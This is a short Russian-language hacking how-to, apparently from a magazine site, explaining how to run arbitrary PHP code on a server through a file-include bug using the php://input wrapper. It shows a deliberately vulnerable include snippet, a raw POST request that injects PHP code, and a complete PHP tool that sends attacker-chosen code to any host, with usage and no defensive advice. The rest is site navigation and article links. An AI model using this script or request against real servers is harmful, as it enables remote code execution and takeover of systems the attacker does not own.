Как выполнить PHP-код через удаленный инклуд

Еще в далеком 2004 году на SecurityLab был
опубликован способ, с помощью которого можно было выполнять
произвольный php-код посредством врапера php://input. Сейчас я
расскажу тебе, как это работает.

Итак, у нас есть уязвимый
файл, с таким содержимым:

<?php

if(isset($_GET['page'])) { include($_GET['page']); }

Когда мы передаем скрипту в параметре page php://input

http://www.example.com/index.php?page=php://input

то происходит считывание и выполнение данных, посланных
методом POST. Грубо говоря, весь массив POST становится файлом,
и include подключает его как обычный файл. Для проведения атаки
мы должны отправить специально сформированный пакет.

1. Сейчас мы отправим PHP-код методом POST:

POST /index.php?page=php://input HTTP/1.1 Accept-Language: en Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2) Host: www.example.com Connection: Keep-Alive Cache-Control: no-cache

<?php phpinfo() ?>

В ответе сервера будет отображен вывод phpinfo().

2. Напишем PHP-скрипт для удобной работы со
средой.

<?php

if (isset($_GET['cmd']) && isset($_GET['host']) && isset($_GET['script'])) { $host = stripslashes(@$_GET['host']); $script = stripslashes(@$_GET['script']); $cmd = htmlspecialchars_decode(stripslashes(@$_GET['cmd'])); $cmd = '<?php ' . $cmd . ' ?>'; $request = "POST /" . $script . "php://input" . " HTTP/1.1\r\n"; $request .= "Accept-Language: en\r\n"; $request .= "Content-Type: application/x-www-form-urlencoded\r\n"; $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n"; $request .= "Host: " . $host . "\r\n"; $request .= "Content-length: " . strlen($cmd) . "\r\n"; $request .= "Connection: Keep-Alive\r\n"; $request .= "Cache-Control: no-cache\r\n"; $request .= "\r\n"; $request .= $cmd . "\r\n"; $socket = fsockopen($host, $port ? $port : 80); fputs($socket, $request); while(!feof($socket)) echo fgets($socket, 1024); fclose($socket); } ?>

3. Запускаем его следующим образом:

http://localhost/input.php?host=www.example.com&script=index.php?page=&cmd=phpinfo()

4. Наслаждаемся результатом :).

← Ранее Как установить OpenVPN на взломанный сервер

Далее → Как найти папки и файлы доступные на запись

Далее по этой теме
Ранее по этой теме

Easy Hack

Firewall’ы относятся к основным средствам защиты при работе в сети. Сейчас они используютс…

03.11.2010
18 мин на чтение
Обзор эксплойтов

В текущем месяце багокопатели не хотят нас баловать новыми громкими эксплойтами в популярн…

14.05.2011
22 мин на чтение
Не спасовать перед лавиной: Подготавливаем веб-сервер к высоким нагрузкам

Популярность веб-страницы – не только благо, но и дополнительная головная боль сисадмина. …

17.01.2011
17 мин на чтение
Knocked-Out AOL: How The AOL Servers Were Hacked

AOL Corporation has always been a kind of honey pie for all possible kinds of hackers. Mi…

02.11.2010
50 мин на чтение
Обзор эксплойтов

Этот месяц был не таким плодотворным на качественные эксплойты, видимо погода сделала свое…

05.12.2010
40 мин на чтение
Нокаут для AOL: получаем привилегии рута на сервере корпорации AOL

Корпорация AOL всегда являлась лакомым кусочком для хакеров всех возможных мастей. Смотри…

20.10.2010
21 мин на чтение

Социальный взлом: Pen-testing популярного движка соцсети

Социальные сети внезапно стали очень популярны. Сейчас социальная сеть – это и способ поо…

04.03.2010
17 мин на чтение
Starry Twitter: Hacking the Stephen Fry account

Watching the feeds, one’s can often face the news that another Twitter account of some Br…

24.12.2009
39 мин на чтение
Звездный Twitter: взлом аккаунта Стивена Фрая

В лентах новостей зачастую можно прочесть о том, что в очередной раз на Твиттере взломан …

21.10.2009
13 мин на чтение
Пилим xBtit: нестандартные уязвимости скриптов

Названия некоторых функций языка PHP настолько просты и понятны, а принципы работы кажутс…

29.03.2010
19 мин на чтение
Unserialize баг в картинках: ошибки десериализации классов на живых примерах

Приветствую тебя, читатель! В январском номере ][ мы подробно рассмотрели один из новейших…

18.05.2010
19 мин на чтение
7 steps from Injection to the Admin Access via RDP

Any break-in pursues its own aim, which determines its value. It's up to you to decide wh…

15.12.2009
86 мин на чтение

Как выполнить PHP-код через удаленный инклуд

Easy Hack

Обзор эксплойтов

Не спасовать перед лавиной: Подготавливаем веб-сервер к высоким нагрузкам

Knocked-Out AOL: How The AOL Servers Were Hacked

Обзор эксплойтов

Нокаут для AOL: получаем привилегии рута на сервере корпорации AOL

Социальный взлом: Pen-testing популярного движка соцсети

Starry Twitter: Hacking the Stephen Fry account

Звездный Twitter: взлом аккаунта Стивена Фрая

Пилим xBtit: нестандартные уязвимости скриптов

Unserialize баг в картинках: ошибки десериализации классов на живых примерах

7 steps from Injection to the Admin Access via RDP

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Хакеры.RU. Глава 0х04. Предварительный этап

2024 год в «Хакере». Колонка главреда

GIGANEWS. Главные события 2024 года по версии «Хакера»

Семь бед — один Semgrep. Ищем уязвимый код с помощью кастомных правил

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Звонки на мобильные и стационарные телефоны через интернет запретят в 2025 году

Сотрудники оборонной компании General Dynamics попались на удочку фишеров

Palo Alto Networks исправила DoS-уязвимость в PAN-OS, и свежий баг уже атакуют хакеры

OtterCookie атакует разработчиков под видом фальшивых предложений о работе

Несколько расширений для Chrome взломаны и теперь содержат вредоносный код